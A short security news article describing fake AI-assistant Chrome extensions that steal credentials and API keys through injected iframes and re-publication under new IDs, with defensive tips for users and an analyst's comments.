Chrome Blocks Malicious AI Assistant Extensions

ai, chatgpt, gpt

A wave of fake AI‑assistant extensions has flooded the Chrome Web Store, stealing passwords, API keys, and email content from more than 260,000 users. These add‑ons masquerade as popular AI tools, promise quick replies, and then silently exfiltrate data to remote servers. If you’ve installed any unknown AI extension, you should act now.

How the Fake AI Extensions Operate

Attackers publish extensions that claim to offer ChatGPT‑style chat, email drafting, or document summarisation. Once you add one, it injects a full‑screen iframe that looks like a legitimate AI interface while it reads the active tab, captures text, and sends credentials back to a command‑and‑control server.

Extension Spraying Tactics

When Google removes a malicious add‑on, the criminals simply re‑publish a copy under a new ID. This “extension spraying” lets the threat stay alive even after takedowns, because each new version shares the same codebase and points to the same malicious domain.

Data Harvesting Mechanics

The iframe can access “read and change all your data on the websites you visit,” a permission most users accept without a second thought. It then extracts authentication tokens, Gmail credentials, and API keys, shipping them to the attacker’s server for later abuse.

Impact on Users and Organizations

Stolen API keys can generate massive cloud bills, while compromised email accounts open the door to business‑email‑compromise attacks. In worst‑case scenarios, attackers leverage those credentials to infiltrate corporate networks, giving them a foothold for further exploitation.

What You Can Do to Stay Safe

  • Treat any extension that asks for “read and change all your data” with suspicion.
  • Verify the publisher’s identity; official OpenAI, Google, or Anthropic extensions appear under verified developer accounts.
  • Regularly audit installed extensions via chrome://extensions and remove anything you don’t recognise.
  • After removal, clear your browser profile to stop lingering data exfiltration.

Expert Insight on AI‑Powered Threats

“We’ve seen a spike in credential‑theft campaigns that piggy‑back on the hype around AI,” says Maya Patel, senior threat analyst at a Fortune‑500 security operations centre. “What makes this threat dangerous is its use of an iframe to load remote code. That means the malicious payload can evolve without any update to the extension itself, slipping past traditional static analysis.”

Patel adds, “If you’re building a legitimate AI extension, publish under a verified Google account, limit permissions to the minimum needed, and provide a clear privacy policy. Users are more likely to trust an extension that explains why it needs access to a particular site.”